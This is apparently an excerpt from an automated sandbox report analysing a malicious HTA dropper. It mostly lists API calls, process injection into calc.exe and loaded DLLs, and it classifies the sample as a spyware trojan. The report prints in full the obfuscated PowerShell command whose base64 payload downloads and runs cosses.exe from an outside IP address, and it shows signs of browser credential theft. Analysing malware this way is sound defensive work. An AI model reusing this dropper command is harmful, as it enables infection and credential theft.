                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672C60 NtCreateKey,7_2_03672C60
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672C00 NtQueryInformationProcess,7_2_03672C00
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672CF0 NtOpenProcess,7_2_03672CF0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672CC0 NtQueryVirtualMemory,7_2_03672CC0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672CA0 NtQueryInformationToken,7_2_03672CA0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E4650 NtSuspendThread,LdrInitializeThunk,12_2_052E4650
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E4340 NtSetContextThread,LdrInitializeThunk,12_2_052E4340
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_052E2D30
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_052E2D10
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_052E2DF0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2DD0 NtDelayExecution,LdrInitializeThunk,12_2_052E2DD0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2C60 NtCreateKey,LdrInitializeThunk,12_2_052E2C60
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_052E2C70
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_052E2CA0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2F30 NtCreateSection,LdrInitializeThunk,12_2_052E2F30
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2FB0 NtResumeThread,LdrInitializeThunk,12_2_052E2FB0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2FE0 NtCreateFile,LdrInitializeThunk,12_2_052E2FE0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_052E2E80
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_052E2EE0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2B60 NtClose,LdrInitializeThunk,12_2_052E2B60
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_052E2BA0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_052E2BE0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_052E2BF0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2AF0 NtWriteFile,LdrInitializeThunk,12_2_052E2AF0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2AD0 NtReadFile,LdrInitializeThunk,12_2_052E2AD0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E35C0 NtCreateMutant,LdrInitializeThunk,12_2_052E35C0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E39B0 NtGetContextThread,LdrInitializeThunk,12_2_052E39B0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2D00 NtSetInformationFile,12_2_052E2D00
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2DB0 NtEnumerateKey,12_2_052E2DB0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2C00 NtQueryInformationProcess,12_2_052E2C00
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2CF0 NtOpenProcess,12_2_052E2CF0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2CC0 NtQueryVirtualMemory,12_2_052E2CC0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2F60 NtCreateProcessEx,12_2_052E2F60
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2FA0 NtQuerySection,12_2_052E2FA0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2F90 NtProtectVirtualMemory,12_2_052E2F90
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2E30 NtWriteVirtualMemory,12_2_052E2E30
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2EA0 NtAdjustPrivilegesToken,12_2_052E2EA0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2B80 NtQueryInformationFile,12_2_052E2B80
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E2AB0 NtWaitForSingleObject,12_2_052E2AB0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E3010 NtOpenDirectoryObject,12_2_052E3010
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E3090 NtSetValueKey,12_2_052E3090
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E3D10 NtOpenProcessToken,12_2_052E3D10
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_052E3D70 NtOpenThread,12_2_052E3D70
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_032592B0 NtCreateFile,12_2_032592B0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_03259720 NtAllocateVirtualMemory,12_2_03259720
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_03259510 NtDeleteFile,12_2_03259510
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_032595B0 NtClose,12_2_032595B0
                  Source: C:\Windows\SysWOW64\calc.exe Code function: 12_2_03259420 NtReadFile,12_2_03259420
                  Source: C:\Users\user\AppData\Roaming\cosses.exe Code function: 6_2_0017A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_0017A1EF
                  Source: C:\Users\user\AppData\Roaming\cosses.exe Code function: 6_2_00168310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00168310
                  Source: C:\Users\user\AppData\Roaming\cosses.exe Code function: 6_2_001751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_001751BD
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C335811_2_026C3358
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026E20E111_2_026E20E1
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C18CD11_2_026C18CD
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C16D111_2_026C16D1
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C9D2111_2_026C9D21
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C358111_2_026C3581
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C158111_2_026C1581
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B053512_2_052B0535
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0537059112_2_05370591
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536244612_2_05362446
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535E4F612_2_0535E4F6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B077012_2_052B0770
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052D475012_2_052D4750
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052AC7C012_2_052AC7C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CC6E012_2_052CC6E0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A010012_2_052A0100
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0534A11812_2_0534A118
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0533815812_2_05338158
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053701AA12_2_053701AA
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053681CC12_2_053681CC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536A35212_2_0536A352
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053703E612_2_053703E6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BE3F012_2_052BE3F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535027412_2_05350274
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053302C012_2_053302C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BAD0012_2_052BAD00
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052C8DBF12_2_052C8DBF
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052AADE012_2_052AADE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B0C0012_2_052B0C00
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05350CB512_2_05350CB5
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A0CF212_2_052A0CF2
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052F2F2812_2_052F2F28
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052D0F3012_2_052D0F30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05324F4012_2_05324F40
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0532EFA012_2_0532EFA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BCFE012_2_052BCFE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A2FC812_2_052A2FC8
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536EE2612_2_0536EE26
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B0E5912_2_052B0E59
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536CE9312_2_0536CE93
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052C2E9012_2_052C2E90
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536EEDB12_2_0536EEDB
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052C696212_2_052C6962
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B29A012_2_052B29A0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0537A9A612_2_0537A9A6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BA84012_2_052BA840
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B284012_2_052B2840
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052968B812_2_052968B8
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052DE8F012_2_052DE8F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536AB4012_2_0536AB40
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05366BD712_2_05366BD7
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052AEA8012_2_052AEA80
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536757112_2_05367571
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0534D5B012_2_0534D5B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536F43F12_2_0536F43F
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A146012_2_052A1460
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536F7B012_2_0536F7B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053616CC12_2_053616CC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E516C12_2_052E516C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0529F17212_2_0529F172
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0537B16B12_2_0537B16B
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BB1B012_2_052BB1B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536F0E012_2_0536F0E0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053670E912_2_053670E9
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B70C012_2_052B70C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535F0CC12_2_0535F0CC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536132D12_2_0536132D
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0529D34C12_2_0529D34C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052F739A12_2_052F739A
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B52A012_2_052B52A0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053512ED12_2_053512ED
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CB2C012_2_052CB2C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05367D7312_2_05367D73
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B3D4012_2_052B3D40
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05361D5A12_2_05361D5A
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CFDC012_2_052CFDC0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05329C3212_2_05329C32
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FCF212_2_0536FCF2
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FF0912_2_0536FF09
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FFB112_2_0536FFB1
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B1F9212_2_052B1F92
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B9EB012_2_052B9EB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B995012_2_052B9950
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CB95012_2_052CB950
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0531D80012_2_0531D800
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B38E012_2_052B38E0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FB7612_2_0536FB76
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CFB8012_2_052CFB80
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05325BF012_2_05325BF0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052EDBF912_2_052EDBF9
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05323A6C12_2_05323A6C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05367A4612_2_05367A46
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FA4912_2_0536FA49
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052F5AA012_2_052F5AA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0534DAAC12_2_0534DAAC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535DAC612_2_0535DAC6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03241F7012_2_03241F70
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323B39C12_2_0323B39C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323B1A012_2_0323B1A0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323B05012_2_0323B050
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323D05012_2_0323D050
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_032437F012_2_032437F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_032455F012_2_032455F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0325BBB012_2_0325BBB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323CE2712_2_0323CE27
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323CE3012_2_0323CE30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500E74C12_2_0500E74C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500E3B412_2_0500E3B4
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500E29412_2_0500E294
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500D81812_2_0500D818
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 85 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 89 times
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: String function: 00138900 appears 42 times
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: String function: 00130AE3 appears 70 times
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: String function: 00117DE1 appears 35 times
Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 052E5130 appears 37 times
Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 0529B970 appears 272 times
Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 0532F290 appears 105 times
Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 052F7E54 appears 98 times
Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 0531EA12 appears 86 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winHTA@18/16@15/10
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017A06A GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001681CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0018EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00114E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1jzkvlz.24s.ps1
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: calc.exe, 0000000C.00000003.1864890428.0000000003464000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1864762177.0000000003443000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3816500953.0000000003491000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3816500953.0000000003464000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1866948572.000000000346E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: clearpicturewithmebestthingsforgivenmebest.hta | Virustotal: Detection: 40%
Source: clearpicturewithmebestthingsforgivenmebest.hta | ReversingLabs: Detection: 27%
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\clearpicturewithmebestthingsforgivenmebest.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'...'+[Char]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\cosses.exe "C:\Users\user\AppData\Roaming\cosses.exe"
Source: C:\Users\user\AppData\Roaming\cosses.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\cosses.exe"
Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | Process created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"
Source: C:\Windows\SysWOW64\calc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
